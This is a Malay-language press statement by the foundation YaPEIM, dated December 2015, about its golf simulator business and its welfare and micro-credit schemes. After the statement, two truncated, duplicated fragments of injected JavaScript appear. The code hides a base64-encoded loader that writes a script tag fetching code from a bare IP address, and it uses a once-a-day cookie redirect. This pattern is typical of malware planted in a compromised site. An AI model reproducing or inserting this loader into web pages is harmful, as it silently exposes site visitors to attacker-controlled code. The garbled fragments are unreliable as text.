YaPEIM » Kenyataan Media YaPEIM

Terkini

Kenyataan Media YaPEIM

Kenyataan Media YaPEIM mengenai Golf Simulator

KENYATAAN MEDIA YaPEIM,
MENGENAI GOLF SIMULATOR

19 DISEMBER 2015

1. Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) telah dan akan terus melaksanakan pelbagai usaha bagi meningkatkan keupayaan kewangannya, samada melalui aktiviti berasaskan perniagaan mahupun aktiviti menggembleng dana bagi menjayakan pelbagai program/skim yg di perkenalkan oleh YaPEIM kepada kumpulan sasar yg di kenal pasti.

2. Diantara program / skim yg sedang dilaksanakan oleh YaPEIM antaranya adalah seperti berikut:

i. Skim Anugerah Kecemerlangan Pelajar Nasional (SANTUN)

Skim ini diperkenalkan sebagai usaha untuk memberi apresiasi kepada pelajar yang telah menunjukkan prestasi tersendiri dalam bidang pelajaran di seluruh negara dan juga dari rantau ini, dengan keutamaan diberikan kepada mereka dari kelompok miskin. Melalui program yang di laksanakan ianya sekaligus sebagai langkah untuk melakukan islah terhadap masa depan mereka.

ii. Kelab Maya Sahabat Ar Rahnu (KELAB MASA)

Pengwujudan Kelab MASA ini adalah termasuk dalam inovasi yang dilaksanakan oleh YaPEIM dalam pelaksanaan Program Mikro Kredit Ar Rahnu. Peranan Kelab ini dilihat sebagai sangat relevan kerana ia dapat membantu kumpulan sasar (usahawan) menjayakan perniagaan secara kecil-kecilan mereka seterusnya berusaha memajukan diri dan keluarga mereka, akhirnya mampu menjadi usahawan yang berdaya saing.

Melalui Kelab ini Sahabat Ar Rahnu telah diberi pendedahan terhadap pelbagai langkah yang boleh memajukan diri mereka. Di antara aspek yang terus diberi penekanan ialah ilmu berhubung dengan perniagaan, pengurusan, pemasaran, peluang perniagaan dan usaha mewujudkan jaringan sesama mereka.

iii. Skim Khairat Nasional

Skim ini diperkenalkan sebagai langkah membantu dari aspek kebajikan membangun usahaniaga anggota keluarga kumpulan sasar yang kehilangan ketua keluarga bagi penerusan kehidupan mereka.

iv. Program Sinar Kasih

Program yang dilaksanakan dengan kerjasama di antara YaPEIM dengan media arus perdana, RTM dan Utusan Malaysia, merupakan langkah sinergi yang sangat inovatif dan langkah proaktif dalam menangani persoalan anak-anak yatim dan anak-anak keluarga termiskin yang ketua keluarga meninggal kerana musibah secara tiba-tiba.

3. Di dalam menjayakan aktiviti berasaskan perniagaan pelbagai usaha dilaksanakan bagi meneroka peluang. Melalui percubaan dalam membentuk model perniagaan secara kecil-kecilan. Melalui percubaan berasaskan model ini, apabila dilihat ada tanda daya maju,ianya akan di laksanakan melalui rancangan perniagaan pada skala yang besar. Sebaliknya jika ianya perlu dikaji semula, ianya akan dilakukan mengikut kesesuaian.

4. Model inilah dijadikan pendekatan dalam meneroka peluang perniagaan baru seperti Golf Simulator dan aktiviti perniagaan lain di laksanakan oleh YaPEIM melalui entiti dimana YaPEIM mempunyai kepentingan.

5. Pendekatan ini jugalah yang dimanfaatkan oleh YaPEIM di dalam memperkenalkan Ar Rahnu YaPEIM, sebelum Ar Rahnu YaPEIM dilaksana sebagai suatu aktiviti perniagaan dan diperluaskannya ke seluruh negara.

6. Dalam perancangan, YaPEIM akan terus menjayakan Jelajah Golf Amal Perdana YaPEIM, sebagai medium perhubungan dan strategi menjayakan Skim Korporat Penyayang YaPEIM dgn institusi dari sektor yg dikenalpasti. Pada masa yg sama YaPEIM juga akan menjadikan sukan golf ini sebagai medium dakwah dan perhubungan antara kaum dan agama di negara ini melalui Program Golf Amal Harmoni, yang akan dilaksanakan dalam masa terdekat.

7. YaPEIM sangat menyedari dan berterima kasih kerana apa yg dilaksanakan YaPEIM sentiasa menjadi perhatian sebahagian daripada masyarakat di negara ini. Atas dasar itu YaPEIM ingin masyarakat juga menyedari bahawa selain daripada keutamaan YaPEIM dalam melaksanakan sesuatu program, bahawa institusi ini sangat peka terhadap keperluan undang-undang dan kehendak syarak, pada masa yang sama YaPEIM juga ingin berkongsi pengalaman bahawa keutamaan institusi ini juga adalah berteraskan pendekatan perniagaan dalam menjayakan program yang dikemukakan.

8. Pendekatan inilah yang berupaya institusi ini menjayakan program dan akan menjamin kelangsungan sesuatu program yang diperkenalkan, samada ianya berupa aktiviti perniagaan, perniagaan bermisi sosial mahupun program pembangunan sosio ekonomi dan kebajikan.

Terima kasih.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top